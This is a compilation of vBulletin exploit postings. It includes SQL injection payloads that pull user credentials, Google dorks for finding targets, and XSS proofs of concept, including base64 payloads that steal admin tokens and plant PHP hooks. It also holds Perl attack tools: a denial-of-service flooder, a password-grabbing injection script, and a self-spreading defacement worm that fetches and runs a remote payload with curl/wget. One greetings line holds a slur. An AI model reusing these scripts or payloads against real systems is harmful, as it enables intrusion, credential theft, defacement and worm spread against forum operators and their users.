====================================================================
#vBulletin  4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability#
====================================================================
#                                                                  #
#         888     d8          888   _   888          ,d   d8       #
#    e88~\888    d88   888-~\ 888 e~ ~  888-~88e  ,d888 _d88__     #
#   d888  888   d888   888    888d8b    888  888b   888  888       #
#   8888  888  / 888   888    888Y88b   888  8888   888  888       #
#   Y888  888 /__888__ 888    888 Y88b  888  888P   888  888       #
#    "88_/888    888   888    888  Y88b 888-_88"    888  "88_/     #
#                                                                  #
====================================================================
#PhilKer - PinoyHack - RootCON - GreyHat Hackers - Security Analyst#
====================================================================
 
#[+] Discovered By   : D4rkB1t
#[+] Site            : NaN
#[+] support e-mail  : [email protected]
 
 
Product: http://www.vbulletin.com
Version: 4.0.x
Dork : inurl:"search.php?search_type=1"
 
--------------------------
#   ~Vulnerable Codes~   #
--------------------------
/vb/search/searchtools.php - line 715;
/packages/vbforum/search/type/socialgroup.php - line 201:203;
 
--------------------------
#        ~Exploit~       #
--------------------------
POST data on "Search Multiple Content Types" => "groups"
 
&cat[0]=1) UNION SELECT database()#
&cat[0]=1) UNION SELECT table_name FROM information_schema.tables#
&cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1#
 
More info: http://j0hnx3r.org/?p=818

vBulletin 3.7.0 <= XSS Explot

    * Requires ajaxReg mod (a common mod)


Found by RoBOTNIK
[email protected]
l3vel-69.net

What is ajaxReg mod?
ajaxReg is a common mod used for checking registration details while you are typing them.

ajaxReg:
http://www.vbulletin.org/forum/showthread.php?t=144869

POC:
http://[website]/[forumpath]/ajax.php?do=CheckUsername&param=# EVIL XSS SCRIPT #
http://www.site.com/forums/ajax.php?do=CheckUsername&param=<script>alert('xss');</script>

===[FOUND BY BaKo]===

########################################

Script: vBulletin Secure Downloads Mod

########################################

Type: SQL Injection

########################################

Usage:

http://site.com/fileinfo.php?id=-1674'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,concat(username,0x3a,password,0x3a,salt),19,20,21,22,23,24,25,26+from+user/*

(the number of columns vary per site. use order by to find the correct number if this doesnt work.)

#######################################

dork: "Powered by Secure Downloads"

#######################################

Discovered by: BaKo -[ciphercrew and h4ck-y0u]-

#######################################

Status: Unpatched

#######################################

Greetz to:
xprog, Novalok, dr wh4x, tulle, inspiratio, illuz1on, cam-man-dan, optiplex, Untamed, GM, t0pP8uZz, Thedefaced, h4ck-y0u, and everyone else I forgot

########################################

~censored~:
all of balcan-crew, those exploit leaking faggots.

########################################

#/usr/bin/perl
#codEd by dEmOn | mE
# --
#   --->    http://devsn.org    <------

##       ---=== vBulletin 3.x.x 'finalupgrade.php' Exploit ===---        ##

######################################
##    NOTE: This vulnerability is not discovered by me...     ##
##     So, I take no credit for the vuln,,,             ##
##   I only Coded the exploit... ..   Anyway, idk who        ##
##    discovered this vuln,, So, GJ! :)             ##
######################################

#   --->    http://devsn.org    <------

use LWP::UserAgent;

$ua = LWP::UserAgent->new;
$ua->agent("Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)");

print "\n ---=== vBulletin 3.x 'finalupgrade.php' Exploit ===---\n\n";

print "\n===============[x]==================\n";
print "        ._.       ___________._.\n";        
print "        | | _____ \\_   _____/| |\n";        
print " ______ | |/     \\ |    __)_ | |  ______\n";
print "/_____/  \\|  Y Y  \\|        \\ \\| /_____/ \n";
print "         _|__|_|  /_______  / __ \n";      
print "         \\/     \\/        \\/  \\/\n";
print "\n===============[x]==================\n";

print "\n Enter the forum URL(e.g. http://www.site.com/vb/ ): ";
$url = <STDIN>;
print "\n\nChecking for vuln..\n";

chomp($url);

my $response = $ua->get($url . 'install/finalupgrade.php?step=http://www.devsn.org');
if ($response->is_success) {
if ($response->content =~ m/vBulletin Database Backup System/gi){
print "\nExploit Success!\n";
print "\n Go TO: " . $url . "install/finalupgrade.php?step=http://www.devsn.org\n";
}
else {
print "\nNot vuln.. Exploit Failed!\n";
}
}
else {
print "\nExploit Failed:";
print "\n" . $response->status_line;
}

print "\n---=== EOF ===---\n";
print "\nhttp://devsn.org\n";
$end = <STDIN>;

#!/usr/bin/perl

#####################
####
#### #### #### #### #### #### #### # # # # ####
#### # # # # # # # # # # # # # #
#### #### # # ### ## #### # #### ## ###
#### # # # # # # # # # # # # #
#### # #### #### # # #### #### # # # # ####
####
#####################

use IO::Socket::INET;
$hahaha = $0;
my $processo = "/usr/local/sbin/httpd";
$SIG{"INT"} = "IGNORE";
$SIG{"HUP"} = "IGNORE";
$SIG{"TERM"} = "IGNORE";
$SIG{"CHLD"} = "IGNORE";
$SIG{"PS"} = "IGNORE";

$0="$processo"."\0"x16;
my $pid=fork;
exit if $pid;

########################
# #
# procura index #
# #
#######################

system("locate index.* >> index");
system("find / -name index.* >> index");

open(a,"<index");
@ind = <a>;
close(a);
$b = scalar(@ind);
for($a=0;$a<=$b;$a++){
chomp $ind[$a];
system("echo spykids ownz your server > $ind[$a]");
}


#########################
# #
# pega sites e registra #
# #
#########################

`cat /etc/httpd/conf/httpd.conf |grep ServerName >> sites`;


open(a,"<sites");
@site = <a>;
close(a);

$b = scalar(@site);

for($a=0;$a<=$b;$a++)
{
$site[$a] =~ s/#//g;
$site[$a] =~ s/servername//g;
$site[$a] =~ s/ServerName//g;
$site[$a] =~ s/ //g;
$testa = IO::Socket::INET->new(PeerAddr => $site[$a], PeerPort => 80, Proto => "tcp") or next;
print $testa "GET / HTTP/1.0\n\n";
print $testa "Host: $site";
print $testa "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.0.1) Gecko/20020823 Netscape/7.0";
print $testa "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,text/css,*/*;q=0.1";
print $testa "Accept-Language: pt-br, pt;q=0.50";
print $testa "Accept-Encoding: gzip, deflate, compress;q=0.9";
print $testa "Accept-Charset: ISO-8859-1, utf-8;q=0.66, *;q=0.66";
print $testa "Keep-Alive: 300";
print $testa "Connection: keep-alive";
@ow = <$testa>;
close($teste);
$ae = "@ow";
if($ae =~/spykids/i){
$sock = IO::Socket::INET->new(PeerAddr => "www.zone-h.org", PeerPort => 80, Proto => "tcp") or die "nao conectou";
print $sock "POST /en/defacements/notify HTTP/1.0\r\n";
print $sock "Accept: */*\r\n";
print $sock "Referer: http://www.zone-h.org/en/defacements/notify\r\n";
print $sock "Accept-Language: pt-br\r\n";
print $sock "Content-Type: application/x-www-form-urlencoded\r\n";
print $sock "Connection: Keep-Alive\r\n";
print $sock "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n";
print $sock "Host: www.zone-h.org\r\n";
print $sock "Content-Length: 385\r\n";
print $sock "Pragma: no-cache\r\n";
print $sock "\r\n";
print $sock "notify_defacer=SpyKids&notify_domain=http%3A%2F%2F$site[$a]&notify_hackmode=18&notify_reason=5&notify=+OK+\r\n";

close($sock);
}
}


#########################
# #
# worm aws.spykids #
# #
########################
while(1){
$cmd = '/misc.php?do=page&template={${system(%22cd%20/tmp;curl%20-O%20http://compras.el-nacional.com/spykids.txt%20;perl%20spykids.txt%20;rm%20-rf%20spykids*;%20wget%20http://compras.el-nacional.com/spykids.txt;%20perl%20spykids.txt;%20rm%20-rf%20%20spykids*%22)}}';




@site = "";
$a=0;
@dom = (".ar",".au",".aw",".ax",".az",".ba",".bb",".bd",".be",".bf",".bg",".bh",".bi",".bj",".bm",".bn",".bo",".br",".bs",".bt",".bv",".bw",".by",".bz",".ca",".cc",".cd",".cf",".cg",".ch",".ci",".ck" , ".cl", ".cm",".cn",".co",".cr",".cs",".cu", ".cv",".cx",".cy",".cz",".de",".dj",".dk",".dm",".do",".dz", ".ec",".ee",".eg",".eh",".er",".es",".et",".fi",".fj",".fk",".fm", ".fo",".fr",".ga",".gb",".gd",".ge",".gf",".gg",".gh",".gi",".gl", ".gm",".gn",".gp",".gq",".gr",".gs",".gt",".gu",".gw",".gy",".hk", ".hm",".hn",".hr",".ht",".hu",".id",".ie",".il",".im",".in",".io",".iq", ".ir",".is",".it",".je",".jm",".jo",".jp",".ke",".kg",".kh",".ki",".km", ".kn",".kp",".kr",".kw",".ky",".kz",".la",".lb",".lc",".li",".lk",".lr",".ls", ".lt",".lu",".lv",".ly",".ma",".mc",".md",".mg",".mh",".mk",".ml",".mm", ".mn",".mo",".mp",".mq",".mr",".ms",".mt",".mu",".mv",".mw",".mx",".my", ".mz",".na",".nc",".ne",".nf",".ng",".ni",".nl",".no",".np",".nr",".nu",".nz",".om", ".pa",".pe",".pf",".pg",".ph",".pk",".pl",".pm",".pn",".pr",".ps",".pt",".pw",".py", ".qa",".re",".ro",".ru",".rw",".sa",".sb",".sc",".sd",".se",".sg",".sh",".si",".sj",".sk",".sl", ".sm",".sn",".so",".sr",".st",".sv",".sy",".sz",".tc",".td",".tf",".tg",".th",".tj",".tk",".tl",".tm", ".tn",".to",".tp",".tr",".tt",".tv",".tw",".tz",".ua",".ug",".uk",".um",".us",".uy",".uz",".va",".vc",".ve",".vg",".vi",".vn", ".vu",".wf",".ws",".ye",".yt",".yu",".za",".zm",".zw");
foreach $dom (@dom){
$site = "www.google.com";
open(a,">pra.txt");
print a "";
close(a);
############### google

for($n=0;$n<1000;$n += 100){
$sock = IO::Socket::INET->new(PeerAddr=>"$site",PeerPort=>"80",Proto=>"tcp") or next;
print $sock "GET h/search?q=%22Powered+by%3A+vBulletin%22inurl%3A$dom&num=100&hl=en&lr=&as_qdr=all&start=$n&sa=N HTTP/1.0\n\n";
print $sock "Host: www.google.com";
print $sock "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.0.1) Gecko/20020823 Netscape/7.0";
print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,text/css,*/*;q=0.1";
print $sock "Accept-Language: pt-br, pt;q=0.50";
print $sock "Accept-Encoding: gzip, deflate, compress;q=0.9";
print $sock "Accept-Charset: ISO-8859-1, utf-8;q=0.66, *;q=0.66";
print $sock "Keep-Alive: 300";
print $sock "Connection: keep-alive";
@resu = <$sock>;
close($sock);
$ae = "@resu";
while ($ae=~ m/<a href=.*?>.*?<\/a>/){
$ae=~ s/<a href=(.*?)>.*?<\/a>/$1/;
$uber=$1;
if ($uber !~/translate/)
{
if ($uber !~ /cache/)
{
if ($uber !~ /"/)
{
if ($uber !~ /google/)
{
if ($uber !~ /216/)
{
if ($uber =~/http/)
{

substr($uber,0,7) = "";
$nu = rindex $uber, '/';
$uber = substr($uber,0,$nu);


open(a,">>pra.txt");
print a "$uber\n";
close(a);

}}}}}}
}
}
$ark = "pra.txt";
@si = "";
open (arquivo,"<$ark");
@si = <arquivo>;
close(arquivo);
$novo ="";
foreach (@si){
if (!$si{$_})
{
$novo .= $_;
$si{$_} = 1;
}
}
open (arquivo,">$ark");
print arquivo $novo;
close(arquivo);
open(a,"<pra.txt");
@site = <a>;
close(a);

foreach $site (@site){
chomp $site;

($site, $dir) = split('/',$site);


$soc = IO::Socket::INET->new(PeerAddr => $site, PeerPort => 80, Proto => "tcp") or next;
print $soc "GET /$dir$cmd HTTP/1.0\n\n";
print $soc "Host: $site";
print $soc "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.0.1) Gecko/20020823 Netscape/7.0";
print $soc "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,text/css,*/*;q=0.1";
print $soc "Accept-Language: pt-br, pt;q=0.50";
print $soc "Accept-Encoding: gzip, deflate, compress;q=0.9";
print $soc "Accept-Charset: ISO-8859-1, utf-8;q=0.66, *;q=0.66";
print $soc "Keep-Alive: 300";
print $soc "Connection: keep-alive";
close($soc);

}
}
}

#!/usr/bin/perl 
 
use IO::Socket; 
 
 
print q{ 
#######################################################################
#    vBulletin? Version 4.0.1 Remote SQL Injection Exploit            #
#                      By indoushka                                   #
#                     www.iq-ty.com/vb                                #
#               Souk Naamane  (00213771818860)                        #
#           Algeria Hackerz ([email protected])                   # 
#          Dork: Powered by vBulletin? Version 4.0.1                  #            
####################################################################### 
}; 
 
if (!$ARGV[2]) { 
 
print q{ 
    Usage: perl  VB4.0.1.pl host /directory/ victim_userid 
 
       perl  VB4.0.1.pl www.vb.com /forum/ 1 
 
 
}; 
 
} 
 
 
$server = $ARGV[0]; 
$dir    = $ARGV[1]; 
$user   = $ARGV[2]; 
$myuser = $ARGV[3]; 
$mypass = $ARGV[4]; 
$myid   = $ARGV[5]; 
 
print "------------------------------------------------------------------------------------------------\r\n"; 
print "[>] SERVER: $server\r\n"; 
print "[>]    DIR: $dir\r\n"; 
print "[>] USERID: $user\r\n"; 
print "------------------------------------------------------------------------------------------------\r\n\r\n"; 
 
$server =~ s/(http:\/\/)//eg; 
 
$path  = $dir; 
$path .= "misc.php?sub=profile&name=0')+UNION+SELECT+0,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM%20deluxebb_users%20WHERE%20(uid= '".$user ; 
 
 
print "[~] PREPARE TO CONNECT...\r\n"; 
 
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "[-] CONNECTION FAILED"; 
 
print "[+] CONNECTED\r\n"; 
print "[~] SENDING QUERY...\r\n"; 
print $socket "GET $path HTTP/1.1\r\n"; 
print $socket "Host: $server\r\n"; 
print $socket "Accept: */*\r\n"; 
print $socket "Connection: close\r\n\r\n"; 
print "[+] DONE!\r\n\r\n"; 
 
 
 
print "--[ REPORT ]------------------------------------------------------------------------------------\r\n"; 
while ($answer = <$socket>) 
{ 
 
 if ($answer =~/(\w{32})/) 
{ 
 
  if ($1 ne 0) { 
   print "Password is: ".$1."\r\n"; 
print "--------------------------------------------------------------------------------------\r\n"; 
 
      } 
exit(); 
} 
 
} 
print "------------------------------------------------------------------------------------------------\r\n";

Attackers can use a browser to exploit this issue.

The following example input is available:

user name = ' ORDER BY 15/*
user name = ' ORDER BY 16/*
user name = ' UNION SELECT 1,2,3,4,5,4,7,8,9,10,11,12,13,14,15 FROM user where+userid=1/*

#!usr/bin/perl
#vBulletin® Version 3.8.2 D3n14l 0f S3rv1c3 Expl01t
#HaCker Anger - Qkk (at) Hotmail (dot) Fr [email concealed]
########################################################################

# Modules #
########################################################################

use IO::SOCKET; # Object interface #
########################################################################

if (@ARGV<1){
print"
########################################################################

## Author : Hacker Anger ##
## TeaM : The Assassin Scorpion TeaM ##
## Home : http://Baloma.NeT ##
## Mail : Qkk (at) Hotmail (dot) Fr [email concealed] ##
## ##
########################################################################

########################################################################

## ## ##
##->vBulletin 3.8.2 Denial of Service Exploit<- ##
##
## ## ##
##Enter These Exploit ## ##
##1.Target ##[*] www.Baloma.net ##
##2.Forum ##[*] vbulletin ##
##3.Exploit ##[*] forumdisplay.php?f= ##
##4.Execution length/timeout ##[*] 7777777777777777 ##
##5.Port ##[*] 80 ##
########################################################################

\a";}
$anger_Block = "
########################################################################
";
$Hacker = "Error!Error!Error!Error";
$H-a =0;
print"$anger_Block\n";
print q(Target->);
chomp($H-zi3l =<STDIN>);
if ($H-zi3l eq""){
die "$Hacker\a\n";}
print"$anger_Block\n";
print"$anger_Block\n";
print q(Path->);
chomp($H4ck3r_4n93r =<STDIN>);
if ($H4ck3r_4n93r eq "") {
die "$Hacker !\a\n";}
print"$anger_Block\n";
print"$anger_Block\n";
print "Vulnerability\n";
print"forumdisplay.php?f=\n";
print"->\n";
chomp($Exploit =<STDIN>);
if ($Exploit eq "") {
die "$Hacker !\a\n";}
print"$anger_Block\n";
print"$anger_Block\n";
print q(Time->);
chomp($H-flood =<STDIN>);
if ($H-flood eq "") {
die "$Hacker !\a\n";}
print"$anger_Block\n";
print"$anger_Block\n";
print q(Port->);
chomp($p0rt =<STDIN>);
if ($p0rt eq ""){
die "$Hacker \n";}
print"$anger_Block\n";
print q(Send "start"->);
chomp($H-start =<STDIN>);
if ($H-start eq "") {
die "$Hacker\n";}
print "$anger_Block\a\n";
print "[+]Check Data \n";
print "[*]Check Target : $H-zi3l\n";
print "[*]Check Forum : $H4ck3r_4n93r\n";
print "[*]Checking Port : $p0rt\n";
print "$anger_Block\n";
if($H-start == 1){
while($H-a != 0000){
$H-a++;}
}elsif ($H-start == start){
while($H-a != $H-flood)
{
$4n93r_postit = "$H-zi3l"."$H4ck3r_4n93r"."$Exploit";
$4n93r_l = length $4n93r_postit;
$4n93r = new IO::Socket::INET (
PeerAddr => "$H-zi3l",
PeerPort => "$p0rt",
Proto => "tcp",
);

print $4n93r "POST $H4ck3r_4n93r$Exploit HTTP/1.1\n";
print $4n93r "Host: $H-zi3l\n";
print $4n93r "Accept:
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plai
n;q=0.8,image/png,*/*;q=0.5\n";
print $4n93r "Referer: $H-zi3l\n";
print $4n93r "Accept-Language: en-us\n";
print $4n93r "Content-Type: application/x-www-form-urlencoded\n";
print $4n93r "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US;
rv:1.7.8) Gecko/20070421 Firefox/2.0.0\n";
print $4n93r "Content-Length: $4n93r_l\n\n";
print $4n93r "$4n93r_postit\n";
close($4n93r);
syswrite STDOUT, "->BLACKOUT<-";
$H-a++;
}
}else{
die "Error - can't connect to target $H-zi3l !\n";
}

vBulletin 3.8.2 adminCP Cross-Site Scripting
R.I.P DrtRp - We miss you
---------------------------------------------
Original Post at http://forum.aria-security.com/en/showthread.php?p=1179
Greetz to Aura & all Aria-Security Mods & Members

These were all tested on vbulletin 3.8.0 RC2 so other version may be effected.

1. Users Title. admincp/usertitle.php?do=modify. Add a new title. use the following code as title name.

<script>document.write('<img src="http://forum.aria-security.com/fa/cb/cb/logo.gif">')</script>
or any other XSS code.

2.Post Icons. admincp/image.php?do=add&table=icon add new title.. give a wrong path such as /images/aria.gif. use the following code as title name.

<script>document.write('<img src="http://forum.aria-security.com/fa/cb/cb/logo.gif">')</script>

3.Post new Smilies. image.php?do=add&table=smilie ... SAME AS #2. use the following code as title name.

<script>document.write('<img src="http://forum.aria-security.com/fa/cb/cb/logo.gif">')</script>

4.New avatar. admincp/image.php?do=add&table=avatar Same as #2. dont forget the update. use the following code as title name.

<script>document.write('<img src="http://forum.aria-security.com/fa/cb/cb/logo.gif">')</script>

http://www.example.com/fileinfo.php?id=1797'+AND(0)+UNION+SELECT+1,1,1,1,1,'Cn4phux',0,0,0,1,0,1,0,0,0,0,0,USER(),DATABASE(),0,0,0,0,0,0,0+OR+'1'='0

1. Sql Injection in "admincp/verify.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~

Impact: low
Preconditions: attacker must have admin account with Human Verification Manager
administer privileges

[---------- source code snippet start ----------]
if ($_POST['do'] == 'updateanswer')
{
$vbulletin->input->clean_array_gpc('p', array(
'answer' => TYPE_STR,
));
..
$db->query_write("
UPDATE " . TABLE_PREFIX . "hvanswer
SET answer = '" . $vbulletin->GPC['answer'] . "'
WHERE answerid = " . $vbulletin->GPC['answerid']
);
[----------- source code snippet end -----------]

It appears, that user submitted parameter "answer" is not properly sanitized
before using in sql query. As result sql injection is possible. Test will 
induce sql error message:

Invalid SQL:
UPDATE vb_hvanswer
SET answer = 'war'axe'
WHERE answerid = 1;

2. Sql Injection in "admincp/attachmentpermission.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~

Impact: low
Preconditions: attacker must have admin account with Attachment Permissions
Manager administer privileges

As in previous case, user submitted parameter, this time it's "extension", is
used in sql query without proper snaitization. This results sql injection 
vulnerability. For test log in as admin with needed privileges and then issue
GET request (using proper URI instead if example):

http://localhost/vbulletin374/admincp/attachmentpermission.php?do=edit&e
xtension=war'axe

This results with error message from vBulletin:

Database error in vBulletin 3.7.4:
Invalid SQL:

SELECT size, width, height
FROM attachmenttype
WHERE extension = 'war'axe';

3. Sql Injection in "admincp/image.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~

Impact: low
Preconditions: attacker must have admin account with Avatars administer privileges

[---------- source code snippet start ----------]
if ($_POST['do'] == 'updatepermissions')
{
$vbulletin->input->clean_array_gpc('p', array(
'iperm' => TYPE_ARRAY,
'imagecategoryid' => TYPE_INT
));
..
foreach($vbulletin->GPC['iperm'] AS $usergroupid => $canuse)
{
if ($canuse == 0)
{
$db->query_write("
INSERT INTO " . TABLE_PREFIX . "imagecategorypermission
(
imagecategoryid,
usergroupid
)
VALUES
(
" . $vbulletin->GPC['imagecategoryid'] . ",
$usergroupid
)
[----------- source code snippet end -----------]

User-submitted array "iperm" is used in sql query without proper sanitization.
This results in sql injection. Testing ends with error message:

MySQL Error : Unknown column 'waraxe' in 'field list'

The XSS in question exists on the log viewing page of the admin control panel.

When a missing page is requested, a log is created in the admin area, however
the inputs to this log lack sanitation. The script name is taken from
basename(PHP_SELF), while the action is taken from _REQUEST['do']. Either one
can be used for introducing XSS vectors.

To highlight the severity and underline the fact that his vulnerability is
exploitable:

<html>
<body>
<img src="http://localhost/vB/upload/admincp/faq.php/0?do=<script>/*" />
<img src="http://localhost/vB/upload/admincp/faq.php/1?do=*/a%3D'document.wri
'/*"
/>
<img src="http://localhost/vB/upload/admincp/faq.php/2?do=*/b%3D'te(%22<scrip
t
'/*" />
<img src="http://localhost/vB/upload/admincp/faq.php/3?do=*/c%3D'src=http://'
/*"
/>
<!--edit to match your data -->
<img src="http://localhost/vB/upload/admincp/faq.php/4?do=*/d%3D'localhost/'/
*"
/>
<img src="http://localhost/vB/upload/admincp/faq.php/5?do=*/e%3D''/*" />
<img src="http://localhost/vB/upload/admincp/faq.php/6?do=*/f%3D't.js></scrip
'/*"
/>
<!-- end edit -->
<img src="http://localhost/vB/upload/admincp/faq.php/7?do=*/g%3D't>%22)'/*" />
<img src="http://localhost/vB/upload/admincp/faq.php/8?do=*/h%3Da%2Bb%2Bc%2Bd
%2Be%2Bf%2Bg/*"
/>
<img src="http://localhost/vB/upload/admincp/faq.php/9?do=*/eval(h)/*" />
<img src="http://localhost/vB/upload/admincp/faq.php/a0?do=*/</script>" />
</body>
</html>

You then need to send the admin to
adminlog.php?do=view&script=&u=0&pp=15&orderby=script&page=1
and the XSS will render.

The limits on the XSS:
basename(PHP_SELF) is 50 characters max and no slashes
_REQUEST['do'] is limited to 20 characters, but no character restriction.

The tight character limits on the unsanitized parameters are not
mitigating the severity, as unlimited
attack space can be obtained as shown above.

As per my last exploits, all XSS in the vBulletin ACP can be used for
PHP injection instantly. This
is due to the design of the vBulletin hooks feature. As this
particular XSS is persistent and will
render in all major browsers it is particularly dangerous.

The XSS in question exists on the login page for the MCP (moderation
control panel).
The login script takes a redirect parameter that lacks sanitation, allowing a
rather easy XSS:

http://localhost/vB3/modcp/index.php?redirect={XSS}

What is even better is that the exploit will work outright if the
admin/moderator is already logged in;
if the admin/moderator is not, they will be required to log in.
However, if an admin
logs into the MCP, he is also logged into the ACP, allowing the same
exploit as last time
(remote PHP code injection via the hooks system).

If you Base64-encode your attack vector using
the data: URI scheme, the XSS survives the login request and activates after
the admin/moderator is logged in. A simple example of the above:

http://localhost/vB3/modcp/index.php?redirect=data:text/html;base64,PHNj
cmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K

In this case (as per the last case as well), you have an unlimited and
unaltered XSS space,
so you're free to invoke some AJAX and have fun.
Just to give ideas on how this could turn into something larger,
vBulletin has hooks that operate using eval(), and new hooks can
be added via the ACP itself. It is trivial to write some JS that not only
enables hooks but also inserts a nice RFI hook. Here's one using the data
URI:

data:text/html;base64,PHNjcmlwdD5ldmFsKCJ1PSdhcHBsaWNhdGlvbi94L3dy1mb3
JtLXVybGVuY29kZWQnO2M9J0NvbnRlbnQtdHlwZSc7ZD0nQ29udGVudC1sZW5ndGgnO3JlZz
0gbmV3IFhNTEh0dHBSZXF1ZXN0KCk7cmVnLm9wZW4oJ0dFVCcsICdodHRwOi8vbG9jYWxob3
N0L3ZCL3VwbG9hZC9hZG1pbmNwL3BsdWdpbi5waHA/ZG89YWRkJywgZmFsc2UpO3JlZy5zZW
5kKG51bGwpO3IgPSByZWcucmVzcG9uc2VUZXh0O3Q9J2h0dHA6Ly9sb2NhbGhvc3QvdkIvdX
Bsb2FkL2FkbWluY3AvcGx1Z2luLnBocCc7aD0nJmFkbWluaGFzaD0nK3Iuc3Vic3RyKHIuaW
5kZXhPZignaGFzaFwiJykrMTMsMzIpO3RvPScmc2VjdXJpdHl0b2tlbj0nK3Iuc3Vic3RyKH
IuaW5kZXhPZigndG9rZW5cIicpKzE0LDQwKTt0Mj0ncHJvZHVjdD12YnVsbGV0aW4maG9va2
5hbWU9Zm9ydW1ob21lX3N0YXJ0JmRvPXVwZGF0ZSZ0aXRsZT1mb28mZXhlY3V0aW9ub3JkZX
I9MSZwaHBjb2RlPXBocGluZm8oKTsmYWN0aXZlPTEnK2grdG87cjIgPSBuZXcgWE1MSHR0cF
JlcXVlc3QoKTtyMi5vcGVuKCdQT1NUJywgdCwgZmFsc2UpO3IyLnNldFJlcXVlc3RIZWFkZX
IoZCwgdDIubGVuZ3RoKTtyMi5zZXRSZXF1ZXN0SGVhZGVyKGMsdSk7cjIuc2VuZCh0Mik7dD
0naHR0cDovL2xvY2FsaG9zdC92Qi91cGxvYWQvYWRtaW5jcC9vcHRpb25zLnBocCc7dDI9J2
RvPWRvb3B0aW9ucyZzZXR0aW5nW2VuYWJsZWhvb2tzXT0xJytoK3RvO3IyPSBuZXcgWE1MSH
R0cFJlcXVlc3QoKTtyMi5vcGVuKCdQT1NUJyx0LGZhbHNlKTtyMi5zZXRSZXF1ZXN0SGVhZG
VyKGQsdDIubGVuZ3RoKTtyMi5zZXRSZXF1ZXN0SGVhZGVyKGMsdSk7cjIuc2VuZCh0Mik7Ii
k8L3NjcmlwdD4K

The above will survive a login prompt. It will then, once executed, proceed
to parse one of the ACP pages and extract the admin hash and token, then
it will enable hooks and add one that executes phpinfo().

Obviously the above requires an admin in this context. Similar techniques
could be used to exploit the modcp as usual, banning users, enabling the
pruning of threads etc.

If you want to cause annoyance, you can esally exploit just a
moderator (and thus have more
success in the exploit being run). This example enables pruning for
all forums on all posts:

data:text/html;base64,PHNjcmlwdD5ldmFsKCJ2PSdodHRwOi8vbG9jYWxob3N0L3ZCL2
1vZGNwL3RocmVhZC5waHA/ZG89Jzt1PSdhcHBsaWNhdGlvbi94L3dy1mb3JtLXVybGVuY2
9kZWQnO2M9J0NvbnRlbnQtdHlwZSc7ZD0nQ29udGVudC1sZW5ndGgnO3JlZz1uZXcgWE1MSH
R0cFJlcXVlc3QoKTtyZWcub3BlbignR0VUJyx2KydwcnVuZScsZmFsc2UpO3JlZy5zZW5kKG
51bGwpO3I9cmVnLnJlc3BvbnNlVGV4dDtoPScmYWRtaW5oYXNoPScrci5zdWJzdHIoci5pbm
RleE9mKCdoYXNoXCInKSsxMywzMik7dG89JyZzZWN1cml0eXRva2VuPScrci5zdWJzdHIoci
5pbmRleE9mKCd0b2tlblwiJykrMTQsNDApO3M9J3RocmVhZFsnO3QyPXMrJ29yaWdpbmFsZG
F5c29sZGVyXT0wJicrcysnb3JpZ2luYWxkYXlzbmV3ZXJdPTAmJytzKydsYXN0ZGF5c29sZG
VyXT0wJicrcysnbGFzdGRheXNuZlcl09MCYnK3MrJ3JlcGxpZXNsZWFzdF09MCYnK3MrJ3
JlcGxpZXNtb3N0XT0tMSYnK3MrJ3ZpZzbGVhc3RdPTAmJytzKyd2aWV3c21vc3RdPS0xJi
crcysnaXNzdGlja3ldPS0xJicrcysnc3RhdGVdPWFueSYnK3MrJ3N0YXR1c109YW55Jicrcy
snZm9ydW1pZF09LTEmJytzKydwb3N0ZWR1c2VyXT0mJytzKyd0aXRsZWNvbnRhaW5zXT0mJy
tzKydzdWJmb3J1bXNdPTEmdHlwZT1wcnVuZSZkbz1kb3RocmVhZHMnK2grdG87cjI9bmV3IF
hNTEh0dHBSZXF1ZXN0KCk7cjIub3BlbignUE9TVCcsdisnZG90aHJlYWRzJyxmYWxzZSk7cj
Iuc2V0UmVWVzdEhlYWRlcihkLHQyLmxlbmd0aCk7cjIuc2V0UmVWVzdEhlYWRlcihjLH
UpO3IyLnNlbmQodDIpO3g9cjIucmVzcG9uc2VUZXh0O3QyPSdkbz1kb3RocmVhZHNhbGwmdH
lwZT1wcnVuZSYnK2grdG8rJyZjcml0ZXJpYT0nK2VzY2FwZSgoeC5zdWJzdHIoeC5pbmRleE
9mKCdyaWEnKSsxMiw3NDcpKS5yZXBsYWNlKC8mcXVvdDsvZywnXCInKSk7cjI9bmV3IFhNTE
h0dHBSZXF1ZXN0KCk7cjIub3BlbignUE9TVCcsdisnZG90aHJlYWRzYWxsJyxmYWxzZSk7cj
Iuc2V0UmVWVzdEhlYWRlcihkLHQyLmxlbmd0aCk7cjIuc2V0UmVWVzdEhlYWRlcihjLH
UpO3IyLnNlbmQodDIpOyIpOzwvc2NyaXB0Pg==

In order to exploit, just get an admin/moderator to click the link.

vBulletin v3.6.5

Dork : "Powered by vBulletin v3.6.5. Copyright ©2000 - 2007 "

-----------------------------------

Exploits :

Http://WWW.Victim.Com/vb/includes/functions.php?classfile=[Shell-Attack]

